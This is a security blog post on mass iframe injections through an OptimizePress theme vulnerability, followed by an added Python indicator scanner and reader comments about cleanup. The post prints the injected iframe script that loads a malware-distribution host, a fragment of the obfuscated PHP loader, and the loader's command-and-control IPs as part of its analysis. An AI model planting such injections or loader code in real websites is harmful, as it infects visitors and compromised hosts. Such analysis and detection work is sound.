Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptimizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleaned were using OptimizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" height="1"></iframe>"

We also saw that Google has started to blacklist the compromised sites, and just for this one iFrame variation (from gezidotojyk.org), they blacklisted almost 1,500 sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gezidotojyk.org appeared to function as an intermediary for the infection of 1442 site(s) including dalluva.com/, criesaude.com/, brownstonefitness.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1382 domain(s), including dalluva.com/, criesaude.com/, pathtoawesome.com/.

Searching for this iFrame

You shouldn’t even bother searching for this iFrame, or the normal “eval” injections you may see. This malware is a lot smarter, hiding itself using multiple encoding variations, and looks similar to this:

$UigPzaGqpe6SKfF= array('5362','5379','5358','5369');$NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611','2598','2594','2613','2598','2592','2599','2614','2607','2596','2613','2602','2608','2607');$jLf0uwhN2GcduBVAgHBD3JvjyPEaIcVDO1u8oBLg7Nksf6S= array('6978','6977','6995','6981','6934','6932','6975','6980','6981','6979','6991','6980','6981');$EEvXCh2Cm5rvV..

When decoded, this payload contacts the malware "mothership" on one of the IPs below to fetch the updated injection. If you have been hit, take a look at your theme and plugin files; you will likely find all of them injected with a similar payload. For ISPs, here are the mothership IP addresses that can be blocked:

$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";
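A small file scanner, added here as an example and not part of Sucuri's tooling, that looks for the indicators this post gives (the arrays of quoted 4-digit strings, the `$know[]` mothership list) plus the `=');?>` tail string and PHP-in-upload/cache-directory check that commenters below report using. The array threshold of six entries and the directory names are assumptions to tune; `demo()` builds a constructed WordPress-like tree in a temp dir so the scan runs offline.

```python
from __future__ import annotations
import re
import tempfile
from pathlib import Path

# Indicators quoted in the post (constructed scanner, not Sucuri's tooling).
MOTHERSHIP_IPS = {"151.236.14.86", "149.154.157.133", "37.235.54.48", "31.215.205.196"}
# A variable assigned an array of six or more quoted 4-digit strings (heuristic threshold).
NUMERIC_ARRAY_RE = re.compile(r"\$\w+\s*=\s*array\(\s*(?:'\d{4}'\s*,\s*){5,}'\d{4}'\s*\)")
# The $know[] = "a.b.c.d"; style C2 list shown in the post.
KNOW_IP_RE = re.compile(r'\$know\[\]\s*=\s*"(\d{1,3}(?:\.\d{1,3}){3})"')
TAIL_MARKER = "=');?>"  # end-of-payload string a commenter used to find infected files

def scan_php_source(src: str) -> list[str]:
    """Return the names of the indicators found in one PHP file's contents."""
    hits = []
    if NUMERIC_ARRAY_RE.search(src):
        hits.append("numeric-array obfuscation")
    for ip in KNOW_IP_RE.findall(src):
        if ip in MOTHERSHIP_IPS:
            hits.append(f"known mothership ip {ip}")
    if TAIL_MARKER in src:
        hits.append("injection tail marker")
    return hits

def scan_tree(root: Path) -> dict[str, list[str]]:
    # Scan every .php file under root; PHP inside upload/cache dirs is flagged on its own.
    findings = {}
    for path in Path(root).rglob("*.php"):
        rel = path.relative_to(root)
        hits = scan_php_source(path.read_text(errors="replace"))
        if {"uploads", "cache"} & set(rel.parts):
            hits.append("php file in upload/cache directory")
        if hits:
            findings[rel.as_posix()] = hits
    return findings

def demo() -> dict[str, list[str]]:
    """Write a constructed WordPress-like tree to a temp dir and scan it."""
    root = Path(tempfile.mkdtemp())
    samples = {  # constructed samples, not real infected files
        "wp-content/themes/optimizepress/header.php":
            "<?php $NBfWJmicev5S= array('2596','2611','2598','2594','2613','2598');\n"
            '$know[] = "151.236.14.86"; $know[] = "10.0.0.1"; ?>\n',
        "wp-content/uploads/2014/03/dropped.php": "<?php echo 'dropped'; ?>\n",
        "wp-includes/clean.php": "<?php function ok() { return 1; } ?>\n",
    }
    for rel, src in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(src)
    return scan_tree(root)
```

Point `scan_tree()` at a site's document root to get a map of relative paths to the indicators found in each.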
Protection and Recovery

You need to update your OptimizePress installations ASAP to prevent reinfection.

Clients using our website firewall are already protected.

The Sucuri Research Team is also analyzing the injections and we will post more details when we learn them.

About Daniel Cid

Sucuri CTO, OSSEC Founder, open source developer and information security professional - dcid.me

  • http://www.codeforest.net Codeforest

    Could you be so kind as to state that the vulnerability was present in OptimizePress version 1 and was fixed in version 1.62 in April, 2013. OptimizePress 2 is based on an entirely new secure code base.

    • Christina Hills

      I concur! This post will cause a lot of confusion for folks who have already updated to OP 1.62

      • confused dude

        What version of optimizepress is the ‘safe’ one? 1.61 or 1.62 . I’m indeed confused.

        • Christina Hills

          You know, I’m not exactly sure. I just updated to 1.62. Contact OptimizePress and find out

        • http://www.codeforest.net Codeforest

          1.62 is secure

    • Guilliam Roque

      Hello Codeforest, the current version on the download page of OptimizePress is 1.64 as of April 03, 2014. So it follows it's already fixed? Please confirm, thanks!

      • http://www.codeforest.net Codeforest

        Yes, all versions after 1.61 are secure

        • Guilliam Roque

          thanks! back to work and cleaning the entire host now :(

  • AJ

    Yes, it's happened overnight to one of our sites. As per Codeforest, will upgrading OptimizePress version 1 work or does it need to be V2?

    • http://www.codeforest.net Codeforest

      Fixed version is OptimizePress 1.61 (released in April 2013), current version of OptimizePress 1 is 1.62.
      OptimizePress 2 was never affected with this vulnerability.

  • Cyber “News & Alerts”

    Nice Discovery, Impressive

  • Drang Boards

    I was provided the suspicious snippet in the Google Webmaster tools, and found your write up on the issue, but to my surprise I don’t have OptimizePress in my list of plugins in wordpress. Am I missing something?

  • Bas

    Note that the IP list as mentioned on this page is only valid for the initial connection attempt. Once an infected server has connected to a ‘mothership’ it will also retrieve a list of new IP addresses and will use those as the new mothership addresses.

    At the moment those addresses are (freshly retrieved from a ‘mothership’ just minutes ago):

  • Monika

    Well it looks as if OP 2.0 is now infected too. My site worked fine earlier this evening and now all I see is the word “array.” Any ideas how I can clean the site from this malware?

  • michael

    Nice ideas.

  • http://marketingwithsergio.com/ Sergio Félix

    My Optimize Press site is infected (whenever I load the site for the first time, there’s a legend about displaying cookies, whatever you click -accept or decline- then a link appears) and I always update as soon as there’s a new release.

    Problem is, MediaTemple were "kind enough" to let me know they can't do anything about it or charge me $175 to have it fixed.

    Needless to say, I moved from Hostgator to get superior support and a friend of mine who is hosted with HG and was having the same exact problem, got it fixed for FREE by the HG guys.

    The irony on this one is KILLING ME.

  • jeffatrackaid

    We’ve been seeing this with a customer using OptimizePress. A major issue is that they use add-on domains in cPanel under a single cPanel account (despite having their own dedicated server). As a result, every add-on domain in the account was hit.

    Another thing we found is hackers uploading PHP shell backdoors. These files can be spotted by having PHP files in various upload/cache directories.

    We have some initial evidence that attackers are uploading these backdoors and then using them later to re-exploit the server — even after you’ve patched things up.

    Unfortunately, remote scanning does not detect these files. We've had to use various on-server scanning tools as well as manually searching for certain string patterns in the code injections.

  • http://www.pqInternet.com Fred Black

    Thanks for posting this. I've been fighting this for a while. I have 1 site on a Windows server that used the pre-patched version of OptimizePress. The infection spread to other WordPress sites not using OptimizePress that are on the same server.

    I found the infection by searching for this string: =');?> i It's at the end of the encrypted PHP that gets put in files such as index.php, wp-config.php, etc. If you do a text search on *.php files looking for that string you will find the infected sites.

    I cleaned all this up several weeks ago, only to find that the site with OptimizePress had become infected again. It had not infected other sites yet. It left a php file in the root of the site with a name I didn’t recognize and that’s where I found the ip addresses that when searched on led me to this blog post. After reading this post, I updated OptimizePress.

    What else does this infection put on the server? My server stops responding several times a day for about 2 minutes and then is fine until the next hang up. What else can I use to find code this exploit uses?